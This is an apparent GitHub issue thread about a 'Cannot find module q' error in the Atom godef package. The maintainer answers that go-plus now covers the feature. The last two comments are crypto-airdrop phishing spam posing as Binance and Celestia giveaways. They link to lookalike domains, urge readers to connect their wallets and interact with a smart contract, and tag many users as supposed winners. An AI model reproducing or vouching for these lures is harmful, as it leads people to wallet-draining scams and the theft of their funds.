### ISSUE TITLE
Failed to activate the godef package

### ISSUE THREAD

**Issue by ddyake** [litgh/atom-godef#6]
[Enter steps to reproduce below:]
1. ...
2. ...

**Atom Version**: 1.0.0
**System**: Mac OS X 10.10.4
**Thrown From**: [godef](https://github.com/litgh/atom-godef) package, v0.2.2
### Stack Trace

Failed to activate the godef package

```
At Cannot find module 'q'

Error: Cannot find module 'q'
    at Module._resolveFilename (module.js:328:15)
    at Function.Module._resolveFilename (/Applications/Atom.app/Contents/Resources/app.asar/src/module-cache.js:383:52)
    at Function.Module._load (module.js:270:25)
    at Module.require (module.js:357:17)
    at require (module.js:376:17)
    at Object.<anonymous> (/Users/ddyake/.atom/packages/godef/lib/godef.coffee:10:7)
    at Object.<anonymous> (/Users/ddyake/.atom/packages/godef/lib/godef.coffee:106:4)
    at Module._compile (module.js:452:26)
    at Object.requireCoffeeScript (/Applications/Atom.app/Contents/Resources/app.asar/node_modules/coffee-cash/lib/coffee-cash.js:85:19)
    at Module.load (module.js:347:32)
```
### Commands

```
     -0:01.5.0 godef:toggle (div.am-panel.tool-panel.panel-bottom.native-key-bindings)
```
### Config

``` json
{
  "core": {
    "themes": [
      "atom-dark-ui",
      "base16-tomorrow-dark-theme"
    ],
    "disabledPackages": [
      "japanese-wrap",
      "themed-settings",
      "atom-sync"
    ]
  },
  "godef": {
    "show": "Right"
  }
}
```
### Installed Packages

``` coffee
# User
Remote-FTP, v0.7.1
atom-html-preview, v0.1.8
go-plus, v3.3.12
godef, v0.2.2
linter-jscs, v1.12.0
linter-php, v0.0.15
project-manager, v1.15.10

# Dev
No dev packages
```

**Comment by litgh** [comment]
go-plus now support godef now , you can use it . this project just for practice.  thx for feedback! :)

**Comment by ddyake** [comment]
ok

**Comment by YourNPC** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @wlemuel, @ubrabbit, @esmahuichao, @pulinwang, @holybao, @junjiebyr, @xujunjie03

**Comment by sxnkr** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!wingyiu, @WenyongYe, @aenvgiell, @arcral, @kaiguan, @SecretMojo, @zyn123d, @sungitly, @VanDeAnna, @kisnows, @ilml, @HustCoderHu, @PickoO1, @franklinzhanpeng, @wdzr, @ningge123, @wonder-all, @wangzhaoming, @xuzhijvn, @randoruf
